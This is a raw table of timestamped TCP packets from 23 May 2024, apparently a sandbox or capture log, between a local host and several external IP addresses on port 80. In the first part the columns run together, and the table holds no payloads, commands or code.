                                  May 23, 2024 15:20:15.243633986 CEST4972780192.168.2.63.33.130.190
                                  May 23, 2024 15:20:16.201037884 CEST4972780192.168.2.63.33.130.190
                                  May 23, 2024 15:20:16.206152916 CEST80497273.33.130.190192.168.2.6
                                  May 23, 2024 15:20:17.221504927 CEST4972880192.168.2.63.33.130.190
                                  May 23, 2024 15:20:17.226644993 CEST80497283.33.130.190192.168.2.6
                                  May 23, 2024 15:20:17.231715918 CEST4972880192.168.2.63.33.130.190
                                  May 23, 2024 15:20:17.233599901 CEST4972880192.168.2.63.33.130.190
                                  May 23, 2024 15:20:17.284791946 CEST80497283.33.130.190192.168.2.6
                                  May 23, 2024 15:20:17.715415001 CEST80497283.33.130.190192.168.2.6
                                  May 23, 2024 15:20:17.715609074 CEST4972880192.168.2.63.33.130.190
                                  May 23, 2024 15:20:18.751509905 CEST4972880192.168.2.63.33.130.190
                                  May 23, 2024 15:20:18.756618977 CEST80497283.33.130.190192.168.2.6
                                  May 23, 2024 15:20:19.767421961 CEST4972980192.168.2.63.33.130.190
                                  May 23, 2024 15:20:19.772583961 CEST80497293.33.130.190192.168.2.6
                                  May 23, 2024 15:20:19.772661924 CEST4972980192.168.2.63.33.130.190
                                  May 23, 2024 15:20:19.774887085 CEST4972980192.168.2.63.33.130.190
                                  May 23, 2024 15:20:19.779795885 CEST80497293.33.130.190192.168.2.6
                                  May 23, 2024 15:20:19.827323914 CEST80497293.33.130.190192.168.2.6
                                  May 23, 2024 15:20:20.240850925 CEST80497293.33.130.190192.168.2.6
                                  May 23, 2024 15:20:20.242594004 CEST4972980192.168.2.63.33.130.190
                                  May 23, 2024 15:20:21.285357952 CEST4972980192.168.2.63.33.130.190
                                  May 23, 2024 15:20:21.290330887 CEST80497293.33.130.190192.168.2.6
                                  May 23, 2024 15:20:23.873794079 CEST4973080192.168.2.63.33.130.190
                                  May 23, 2024 15:20:23.879046917 CEST80497303.33.130.190192.168.2.6
                                  May 23, 2024 15:20:23.879131079 CEST4973080192.168.2.63.33.130.190
                                  May 23, 2024 15:20:23.881931067 CEST4973080192.168.2.63.33.130.190
                                  May 23, 2024 15:20:23.932765961 CEST80497303.33.130.190192.168.2.6
                                  May 23, 2024 15:20:24.347069025 CEST80497303.33.130.190192.168.2.6
                                  May 23, 2024 15:20:24.351665974 CEST80497303.33.130.190192.168.2.6
                                  May 23, 2024 15:20:24.351751089 CEST4973080192.168.2.63.33.130.190
                                  May 23, 2024 15:20:24.352654934 CEST4973080192.168.2.63.33.130.190
                                  May 23, 2024 15:20:24.361397982 CEST80497303.33.130.190192.168.2.6
                                  May 23, 2024 15:20:29.393810034 CEST4973180192.168.2.63.33.130.190
                                  May 23, 2024 15:20:29.398775101 CEST80497313.33.130.190192.168.2.6
                                  May 23, 2024 15:20:29.403646946 CEST4973180192.168.2.63.33.130.190
                                  May 23, 2024 15:20:29.405294895 CEST4973180192.168.2.63.33.130.190
                                  May 23, 2024 15:20:29.467159986 CEST80497313.33.130.190192.168.2.6
                                  May 23, 2024 15:20:29.866977930 CEST80497313.33.130.190192.168.2.6
                                  May 23, 2024 15:20:29.867082119 CEST4973180192.168.2.63.33.130.190
                                  May 23, 2024 15:20:30.919832945 CEST4973180192.168.2.63.33.130.190
                                  May 23, 2024 15:20:30.929963112 CEST80497313.33.130.190192.168.2.6
                                  May 23, 2024 15:20:31.938399076 CEST4973280192.168.2.63.33.130.190
                                  May 23, 2024 15:20:31.943458080 CEST80497323.33.130.190192.168.2.6
                                  May 23, 2024 15:20:31.943546057 CEST4973280192.168.2.63.33.130.190
                                  May 23, 2024 15:20:31.945274115 CEST4973280192.168.2.63.33.130.190
                                  May 23, 2024 15:20:31.997164965 CEST80497323.33.130.190192.168.2.6
                                  May 23, 2024 15:20:32.416873932 CEST80497323.33.130.190192.168.2.6
                                  May 23, 2024 15:20:32.416948080 CEST4973280192.168.2.63.33.130.190
                                  May 23, 2024 15:20:33.451167107 CEST4973280192.168.2.63.33.130.190
                                  May 23, 2024 15:20:33.456363916 CEST80497323.33.130.190192.168.2.6
                                  May 23, 2024 15:20:34.470274925 CEST4973380192.168.2.63.33.130.190
                                  May 23, 2024 15:20:34.476748943 CEST80497333.33.130.190192.168.2.6
                                  May 23, 2024 15:20:34.476831913 CEST4973380192.168.2.63.33.130.190
                                  May 23, 2024 15:20:34.479114056 CEST4973380192.168.2.63.33.130.190
                                  May 23, 2024 15:20:34.485146999 CEST80497333.33.130.190192.168.2.6
                                  May 23, 2024 15:20:34.531474113 CEST80497333.33.130.190192.168.2.6
                                  May 23, 2024 15:20:34.936299086 CEST80497333.33.130.190192.168.2.6
                                  May 23, 2024 15:20:34.936599016 CEST4973380192.168.2.63.33.130.190
                                  May 23, 2024 15:20:35.982726097 CEST4973380192.168.2.63.33.130.190
                                  May 23, 2024 15:20:35.987730026 CEST80497333.33.130.190192.168.2.6
                                  May 23, 2024 15:20:37.003519058 CEST4973480192.168.2.63.33.130.190
                                  May 23, 2024 15:20:37.051700115 CEST80497343.33.130.190192.168.2.6
                                  May 23, 2024 15:20:37.053744078 CEST4973480192.168.2.63.33.130.190
May 23, 2024 15:20:37.057490110 CEST | 49734 | 80 | 192.168.2.6 | 3.33.130.190
May 23, 2024 15:20:37.106631994 CEST | 80 | 49734 | 3.33.130.190 | 192.168.2.6
May 23, 2024 15:20:37.767565966 CEST | 80 | 49734 | 3.33.130.190 | 192.168.2.6
May 23, 2024 15:20:37.772811890 CEST | 80 | 49734 | 3.33.130.190 | 192.168.2.6
May 23, 2024 15:20:37.772855043 CEST | 80 | 49734 | 3.33.130.190 | 192.168.2.6
May 23, 2024 15:20:37.772927046 CEST | 49734 | 80 | 192.168.2.6 | 3.33.130.190
May 23, 2024 15:20:37.772953033 CEST | 49734 | 80 | 192.168.2.6 | 3.33.130.190
May 23, 2024 15:20:37.773822069 CEST | 49734 | 80 | 192.168.2.6 | 3.33.130.190
May 23, 2024 15:20:37.828834057 CEST | 80 | 49734 | 3.33.130.190 | 192.168.2.6
May 23, 2024 15:20:42.862416029 CEST | 49735 | 80 | 192.168.2.6 | 185.253.212.22
May 23, 2024 15:20:42.868685007 CEST | 80 | 49735 | 185.253.212.22 | 192.168.2.6
May 23, 2024 15:20:42.868913889 CEST | 49735 | 80 | 192.168.2.6 | 185.253.212.22
May 23, 2024 15:20:42.874552011 CEST | 49735 | 80 | 192.168.2.6 | 185.253.212.22
May 23, 2024 15:20:42.930727005 CEST | 80 | 49735 | 185.253.212.22 | 192.168.2.6
May 23, 2024 15:20:43.549030066 CEST | 80 | 49735 | 185.253.212.22 | 192.168.2.6
May 23, 2024 15:20:43.553746939 CEST | 80 | 49735 | 185.253.212.22 | 192.168.2.6
May 23, 2024 15:20:43.553883076 CEST | 49735 | 80 | 192.168.2.6 | 185.253.212.22
May 23, 2024 15:20:44.373100996 CEST | 49735 | 80 | 192.168.2.6 | 185.253.212.22
May 23, 2024 15:20:45.407531023 CEST | 49736 | 80 | 192.168.2.6 | 185.253.212.22
May 23, 2024 15:20:45.413681030 CEST | 80 | 49736 | 185.253.212.22 | 192.168.2.6
May 23, 2024 15:20:45.413938046 CEST | 49736 | 80 | 192.168.2.6 | 185.253.212.22
May 23, 2024 15:20:45.419533968 CEST | 49736 | 80 | 192.168.2.6 | 185.253.212.22
May 23, 2024 15:20:45.464896917 CEST | 80 | 49736 | 185.253.212.22 | 192.168.2.6
May 23, 2024 15:20:46.074805975 CEST | 80 | 49736 | 185.253.212.22 | 192.168.2.6
May 23, 2024 15:20:46.079587936 CEST | 80 | 49736 | 185.253.212.22 | 192.168.2.6
May 23, 2024 15:20:46.079648972 CEST | 49736 | 80 | 192.168.2.6 | 185.253.212.22
May 23, 2024 15:20:46.923554897 CEST | 49736 | 80 | 192.168.2.6 | 185.253.212.22
May 23, 2024 15:20:47.938436031 CEST | 49737 | 80 | 192.168.2.6 | 185.253.212.22
May 23, 2024 15:20:47.943578005 CEST | 80 | 49737 | 185.253.212.22 | 192.168.2.6
May 23, 2024 15:20:47.943682909 CEST | 49737 | 80 | 192.168.2.6 | 185.253.212.22
May 23, 2024 15:20:47.945456028 CEST | 49737 | 80 | 192.168.2.6 | 185.253.212.22
May 23, 2024 15:20:47.950525045 CEST | 80 | 49737 | 185.253.212.22 | 192.168.2.6
May 23, 2024 15:20:47.999356985 CEST | 80 | 49737 | 185.253.212.22 | 192.168.2.6
May 23, 2024 15:20:48.639616013 CEST | 80 | 49737 | 185.253.212.22 | 192.168.2.6
May 23, 2024 15:20:48.644390106 CEST | 80 | 49737 | 185.253.212.22 | 192.168.2.6
May 23, 2024 15:20:48.644509077 CEST | 49737 | 80 | 192.168.2.6 | 185.253.212.22
May 23, 2024 15:20:49.451134920 CEST | 49737 | 80 | 192.168.2.6 | 185.253.212.22
May 23, 2024 15:20:50.470335007 CEST | 49738 | 80 | 192.168.2.6 | 185.253.212.22
May 23, 2024 15:20:50.477689981 CEST | 80 | 49738 | 185.253.212.22 | 192.168.2.6
May 23, 2024 15:20:50.477780104 CEST | 49738 | 80 | 192.168.2.6 | 185.253.212.22
May 23, 2024 15:20:50.479813099 CEST | 49738 | 80 | 192.168.2.6 | 185.253.212.22
May 23, 2024 15:20:50.542557955 CEST | 80 | 49738 | 185.253.212.22 | 192.168.2.6
May 23, 2024 15:20:51.161376953 CEST | 80 | 49738 | 185.253.212.22 | 192.168.2.6
May 23, 2024 15:20:51.166100025 CEST | 80 | 49738 | 185.253.212.22 | 192.168.2.6
May 23, 2024 15:20:51.166237116 CEST | 49738 | 80 | 192.168.2.6 | 185.253.212.22
May 23, 2024 15:20:51.167047977 CEST | 49738 | 80 | 192.168.2.6 | 185.253.212.22
May 23, 2024 15:20:51.225291014 CEST | 80 | 49738 | 185.253.212.22 | 192.168.2.6
May 23, 2024 15:21:01.486296892 CEST | 49739 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:01.491297960 CEST | 80 | 49739 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:01.491378069 CEST | 49739 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:01.493554115 CEST | 49739 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:01.544825077 CEST | 80 | 49739 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:02.944266081 CEST | 80 | 49739 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:02.945076942 CEST | 80 | 49739 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:02.945122957 CEST | 49739 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:02.947685957 CEST | 80 | 49739 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:02.947694063 CEST | 80 | 49739 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:02.947740078 CEST | 49739 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:02.952892065 CEST | 80 | 49739 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:02.957261086 CEST | 80 | 49739 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:02.957269907 CEST | 80 | 49739 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:02.957357883 CEST | 49739 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:02.961905956 CEST | 80 | 49739 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:02.961913109 CEST | 80 | 49739 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:02.961952925 CEST | 49739 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:02.966840029 CEST | 80 | 49739 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:02.966850042 CEST | 80 | 49739 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:02.966933966 CEST | 49739 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:03.001660109 CEST | 80 | 49739 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:03.002404928 CEST | 49739 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:03.002646923 CEST | 49739 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:04.016809940 CEST | 49740 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:04.022001982 CEST | 80 | 49740 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:04.022088051 CEST | 49740 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:04.025677919 CEST | 49740 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:04.119369030 CEST | 80 | 49740 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:05.146579981 CEST | 80 | 49740 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:05.147507906 CEST | 80 | 49740 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:05.148248911 CEST | 49740 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:05.149630070 CEST | 80 | 49740 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:05.151870966 CEST | 80 | 49740 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:05.151881933 CEST | 80 | 49740 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:05.151896954 CEST | 80 | 49740 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:05.151956081 CEST | 49740 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:05.151956081 CEST | 49740 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:05.156491041 CEST | 80 | 49740 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:05.158360958 CEST | 80 | 49740 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:05.158432007 CEST | 49740 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:05.160121918 CEST | 80 | 49740 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:05.160130978 CEST | 80 | 49740 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:05.160142899 CEST | 80 | 49740 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:05.160207987 CEST | 49740 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:05.163533926 CEST | 80 | 49740 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:05.163661957 CEST | 49740 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:05.211277008 CEST | 80 | 49740 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:05.211675882 CEST | 49740 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:05.529515028 CEST | 49740 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:06.551584959 CEST | 49741 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:06.556760073 CEST | 80 | 49741 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:06.559727907 CEST | 49741 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:06.563597918 CEST | 49741 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:06.568643093 CEST | 80 | 49741 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:06.615406036 CEST | 80 | 49741 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:07.644262075 CEST | 80 | 49741 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:07.644926071 CEST | 80 | 49741 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:07.646743059 CEST | 80 | 49741 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:07.646754980 CEST | 80 | 49741 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:07.646764994 CEST | 80 | 49741 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:07.646765947 CEST | 49741 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:07.646862984 CEST | 49741 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:07.650397062 CEST | 80 | 49741 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:07.650432110 CEST | 80 | 49741 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:07.650542021 CEST | 49741 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:07.654035091 CEST | 80 | 49741 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:07.654047966 CEST | 80 | 49741 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:07.654128075 CEST | 49741 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:07.657695055 CEST | 80 | 49741 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:07.657706976 CEST | 80 | 49741 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:07.657718897 CEST | 80 | 49741 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:07.657800913 CEST | 49741 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:07.657800913 CEST | 49741 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:07.692039967 CEST | 80 | 49741 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:07.692137003 CEST | 49741 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:08.076585054 CEST | 49741 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:09.094419003 CEST | 49742 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:09.101615906 CEST | 80 | 49742 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:09.101725101 CEST | 49742 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:09.103352070 CEST | 49742 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:09.158382893 CEST | 80 | 49742 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:10.668983936 CEST | 80 | 49742 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:10.673681021 CEST | 80 | 49742 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:10.673763990 CEST | 49742 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:10.674691916 CEST | 49742 | 80 | 192.168.2.6 | 87.236.16.214
May 23, 2024 15:21:10.725004911 CEST | 80 | 49742 | 87.236.16.214 | 192.168.2.6
May 23, 2024 15:21:15.737406969 CEST | 49743 | 80 | 192.168.2.6 | 188.114.96.3
May 23, 2024 15:21:15.748049021 CEST | 80 | 49743 | 188.114.96.3 | 192.168.2.6
May 23, 2024 15:21:15.748123884 CEST | 49743 | 80 | 192.168.2.6 | 188.114.96.3
May 23, 2024 15:21:15.750020027 CEST | 49743 | 80 | 192.168.2.6 | 188.114.96.3
May 23, 2024 15:21:15.757812023 CEST | 80 | 49743 | 188.114.96.3 | 192.168.2.6
May 23, 2024 15:21:17.263838053 CEST | 49743 | 80 | 192.168.2.6 | 188.114.96.3
May 23, 2024 15:21:17.269745111 CEST | 80 | 49743 | 188.114.96.3 | 192.168.2.6
May 23, 2024 15:21:17.269908905 CEST | 49743 | 80 | 192.168.2.6 | 188.114.96.3
May 23, 2024 15:21:18.282290936 CEST | 49744 | 80 | 192.168.2.6 | 188.114.96.3
May 23, 2024 15:21:18.287420034 CEST | 80 | 49744 | 188.114.96.3 | 192.168.2.6
May 23, 2024 15:21:18.287499905 CEST | 49744 | 80 | 192.168.2.6 | 188.114.96.3
May 23, 2024 15:21:18.289376974 CEST | 49744 | 80 | 192.168.2.6 | 188.114.96.3
May 23, 2024 15:21:18.341449022 CEST | 80 | 49744 | 188.114.96.3 | 192.168.2.6
May 23, 2024 15:21:19.794919968 CEST | 49744 | 80 | 192.168.2.6 | 188.114.96.3
May 23, 2024 15:21:19.800726891 CEST | 80 | 49744 | 188.114.96.3 | 192.168.2.6
May 23, 2024 15:21:19.800856113 CEST | 49744 | 80 | 192.168.2.6 | 188.114.96.3
May 23, 2024 15:21:20.815623999 CEST | 49745 | 80 | 192.168.2.6 | 188.114.96.3
May 23, 2024 15:21:20.820769072 CEST | 80 | 49745 | 188.114.96.3 | 192.168.2.6
May 23, 2024 15:21:20.820883036 CEST | 49745 | 80 | 192.168.2.6 | 188.114.96.3
May 23, 2024 15:21:20.823626041 CEST | 49745 | 80 | 192.168.2.6 | 188.114.96.3
May 23, 2024 15:21:20.828850031 CEST | 80 | 49745 | 188.114.96.3 | 192.168.2.6
May 23, 2024 15:21:20.875571012 CEST | 80 | 49745 | 188.114.96.3 | 192.168.2.6
May 23, 2024 15:21:22.326150894 CEST | 49745 | 80 | 192.168.2.6 | 188.114.96.3
May 23, 2024 15:21:22.333704948 CEST | 80 | 49745 | 188.114.96.3 | 192.168.2.6
May 23, 2024 15:21:22.333759069 CEST | 49745 | 80 | 192.168.2.6 | 188.114.96.3
May 23, 2024 15:21:23.344556093 CEST | 49746 | 80 | 192.168.2.6 | 188.114.96.3
May 23, 2024 15:21:23.349739075 CEST | 80 | 49746 | 188.114.96.3 | 192.168.2.6
May 23, 2024 15:21:23.351728916 CEST | 49746 | 80 | 192.168.2.6 | 188.114.96.3
May 23, 2024 15:21:23.355711937 CEST | 49746 | 80 | 192.168.2.6 | 188.114.96.3
May 23, 2024 15:21:23.404870987 CEST | 80 | 49746 | 188.114.96.3 | 192.168.2.6
May 23, 2024 15:21:25.013010025 CEST | 80 | 49746 | 188.114.96.3 | 192.168.2.6
May 23, 2024 15:21:25.017741919 CEST | 80 | 49746 | 188.114.96.3 | 192.168.2.6
May 23, 2024 15:21:25.019820929 CEST | 49746 | 80 | 192.168.2.6 | 188.114.96.3
May 23, 2024 15:21:25.021030903 CEST | 49746 | 80 | 192.168.2.6 | 188.114.96.3
May 23, 2024 15:21:25.076888084 CEST | 80 | 49746 | 188.114.96.3 | 192.168.2.6
May 23, 2024 15:21:30.220215082 CEST | 49747 | 80 | 192.168.2.6 | 194.58.112.174
May 23, 2024 15:21:30.225187063 CEST | 80 | 49747 | 194.58.112.174 | 192.168.2.6
May 23, 2024 15:21:30.225260973 CEST | 49747 | 80 | 192.168.2.6 | 194.58.112.174
May 23, 2024 15:21:30.227165937 CEST | 49747 | 80 | 192.168.2.6 | 194.58.112.174
May 23, 2024 15:21:30.276937962 CEST | 80 | 49747 | 194.58.112.174 | 192.168.2.6
May 23, 2024 15:21:30.924962044 CEST | 80 | 49747 | 194.58.112.174 | 192.168.2.6
May 23, 2024 15:21:30.931269884 CEST | 80 | 49747 | 194.58.112.174 | 192.168.2.6
May 23, 2024 15:21:30.934354067 CEST | 49747 | 80 | 192.168.2.6 | 194.58.112.174
May 23, 2024 15:21:31.732403040 CEST | 49747 | 80 | 192.168.2.6 | 194.58.112.174
May 23, 2024 15:21:32.750935078 CEST | 49748 | 80 | 192.168.2.6 | 194.58.112.174
May 23, 2024 15:21:32.759689093 CEST | 80 | 49748 | 194.58.112.174 | 192.168.2.6
May 23, 2024 15:21:32.763834000 CEST | 49748 | 80 | 192.168.2.6 | 194.58.112.174
May 23, 2024 15:21:32.767630100 CEST | 49748 | 80 | 192.168.2.6 | 194.58.112.174
May 23, 2024 15:21:32.824800014 CEST | 80 | 49748 | 194.58.112.174 | 192.168.2.6
May 23, 2024 15:21:33.475075960 CEST | 80 | 49748 | 194.58.112.174 | 192.168.2.6
May 23, 2024 15:21:33.526933908 CEST | 80 | 49748 | 194.58.112.174 | 192.168.2.6
May 23, 2024 15:21:33.526957035 CEST | 80 | 49748 | 194.58.112.174 | 192.168.2.6
May 23, 2024 15:21:33.527223110 CEST | 49748 | 80 | 192.168.2.6 | 194.58.112.174
May 23, 2024 15:21:34.279439926 CEST | 49748 | 80 | 192.168.2.6 | 194.58.112.174
May 23, 2024 15:21:35.297930956 CEST | 49749 | 80 | 192.168.2.6 | 194.58.112.174
May 23, 2024 15:21:35.375359058 CEST | 80 | 49749 | 194.58.112.174 | 192.168.2.6
May 23, 2024 15:21:35.378506899 CEST | 49749 | 80 | 192.168.2.6 | 194.58.112.174
May 23, 2024 15:21:35.383677959 CEST | 49749 | 80 | 192.168.2.6 | 194.58.112.174
May 23, 2024 15:21:35.388906002 CEST | 80 | 49749 | 194.58.112.174 | 192.168.2.6
May 23, 2024 15:21:35.436543941 CEST | 80 | 49749 | 194.58.112.174 | 192.168.2.6
May 23, 2024 15:21:36.066885948 CEST | 80 | 49749 | 194.58.112.174 | 192.168.2.6
May 23, 2024 15:21:36.071671009 CEST | 80 | 49749 | 194.58.112.174 | 192.168.2.6
May 23, 2024 15:21:36.071995020 CEST | 49749 | 80 | 192.168.2.6 | 194.58.112.174
May 23, 2024 15:21:36.890065908 CEST | 49749 | 80 | 192.168.2.6 | 194.58.112.174
May 23, 2024 15:21:37.907627106 CEST | 49750 | 80 | 192.168.2.6 | 194.58.112.174
May 23, 2024 15:21:37.913099051 CEST | 80 | 49750 | 194.58.112.174 | 192.168.2.6
May 23, 2024 15:21:37.913630009 CEST | 49750 | 80 | 192.168.2.6 | 194.58.112.174
May 23, 2024 15:21:37.915666103 CEST | 49750 | 80 | 192.168.2.6 | 194.58.112.174
May 23, 2024 15:21:37.968492031 CEST | 80 | 49750 | 194.58.112.174 | 192.168.2.6
May 23, 2024 15:21:38.712148905 CEST | 80 | 49750 | 194.58.112.174 | 192.168.2.6
May 23, 2024 15:21:38.717519045 CEST | 80 | 49750 | 194.58.112.174 | 192.168.2.6
May 23, 2024 15:21:38.719877005 CEST | 49750 | 80 | 192.168.2.6 | 194.58.112.174
May 23, 2024 15:21:38.723648071 CEST | 49750 | 80 | 192.168.2.6 | 194.58.112.174
May 23, 2024 15:21:38.779093981 CEST | 80 | 49750 | 194.58.112.174 | 192.168.2.6
May 23, 2024 15:21:43.946423054 CEST | 49751 | 80 | 192.168.2.6 | 5.101.153.149
May 23, 2024 15:21:43.951916933 CEST | 80 | 49751 | 5.101.153.149 | 192.168.2.6
May 23, 2024 15:21:43.952001095 CEST | 49751 | 80 | 192.168.2.6 | 5.101.153.149
May 23, 2024 15:21:43.953802109 CEST | 49751 | 80 | 192.168.2.6 | 5.101.153.149
May 23, 2024 15:21:44.009502888 CEST | 80 | 49751 | 5.101.153.149 | 192.168.2.6
May 23, 2024 15:21:44.697736979 CEST | 80 | 49751 | 5.101.153.149 | 192.168.2.6
May 23, 2024 15:21:44.702784061 CEST | 80 | 49751 | 5.101.153.149 | 192.168.2.6
May 23, 2024 15:21:44.706698895 CEST | 49751 | 80 | 192.168.2.6 | 5.101.153.149
May 23, 2024 15:21:46.476279974 CEST | 49751 | 80 | 192.168.2.6 | 5.101.153.149
May 23, 2024 15:21:47.485529900 CEST | 49752 | 80 | 192.168.2.6 | 5.101.153.149
May 23, 2024 15:21:47.490490913 CEST | 80 | 49752 | 5.101.153.149 | 192.168.2.6
May 23, 2024 15:21:47.490564108 CEST | 49752 | 80 | 192.168.2.6 | 5.101.153.149
May 23, 2024 15:21:47.492356062 CEST | 49752 | 80 | 192.168.2.6 | 5.101.153.149
May 23, 2024 15:21:47.540918112 CEST | 80 | 49752 | 5.101.153.149 | 192.168.2.6
May 23, 2024 15:21:48.243093967 CEST | 80 | 49752 | 5.101.153.149 | 192.168.2.6
May 23, 2024 15:21:48.247819901 CEST | 80 | 49752 | 5.101.153.149 | 192.168.2.6
May 23, 2024 15:21:48.248980045 CEST | 49752 | 80 | 192.168.2.6 | 5.101.153.149
May 23, 2024 15:21:48.998099089 CEST | 49752 | 80 | 192.168.2.6 | 5.101.153.149
May 23, 2024 15:21:50.017710924 CEST | 49753 | 80 | 192.168.2.6 | 5.101.153.149
May 23, 2024 15:21:50.022763014 CEST | 80 | 49753 | 5.101.153.149 | 192.168.2.6
May 23, 2024 15:21:50.022864103 CEST | 49753 | 80 | 192.168.2.6 | 5.101.153.149
May 23, 2024 15:21:50.024755001 CEST | 49753 | 80 | 192.168.2.6 | 5.101.153.149
May 23, 2024 15:21:50.030036926 CEST | 80 | 49753 | 5.101.153.149 | 192.168.2.6
May 23, 2024 15:21:50.075437069 CEST | 80 | 49753 | 5.101.153.149 | 192.168.2.6
May 23, 2024 15:21:50.764741898 CEST | 80 | 49753 | 5.101.153.149 | 192.168.2.6
May 23, 2024 15:21:50.773209095 CEST | 80 | 49753 | 5.101.153.149 | 192.168.2.6
May 23, 2024 15:21:50.773263931 CEST | 49753 | 80 | 192.168.2.6 | 5.101.153.149
May 23, 2024 15:21:51.529545069 CEST | 49753 | 80 | 192.168.2.6 | 5.101.153.149
May 23, 2024 15:21:52.549390078 CEST | 49754 | 80 | 192.168.2.6 | 5.101.153.149
May 23, 2024 15:21:52.557228088 CEST | 80 | 49754 | 5.101.153.149 | 192.168.2.6
May 23, 2024 15:21:52.557360888 CEST | 49754 | 80 | 192.168.2.6 | 5.101.153.149
May 23, 2024 15:21:52.561395884 CEST | 49754 | 80 | 192.168.2.6 | 5.101.153.149
May 23, 2024 15:21:52.609430075 CEST | 80 | 49754 | 5.101.153.149 | 192.168.2.6
May 23, 2024 15:21:53.305222988 CEST | 80 | 49754 | 5.101.153.149 | 192.168.2.6
May 23, 2024 15:21:53.310044050 CEST | 80 | 49754 | 5.101.153.149 | 192.168.2.6
May 23, 2024 15:21:53.310139894 CEST | 49754 | 80 | 192.168.2.6 | 5.101.153.149
May 23, 2024 15:21:53.311002016 CEST | 49754 | 80 | 192.168.2.6 | 5.101.153.149
May 23, 2024 15:21:53.361002922 CEST | 80 | 49754 | 5.101.153.149 | 192.168.2.6
May 23, 2024 15:21:58.460815907 CEST | 49755 | 80 | 192.168.2.6 | 92.118.24.161
May 23, 2024 15:21:58.465908051 CEST | 80 | 49755 | 92.118.24.161 | 192.168.2.6
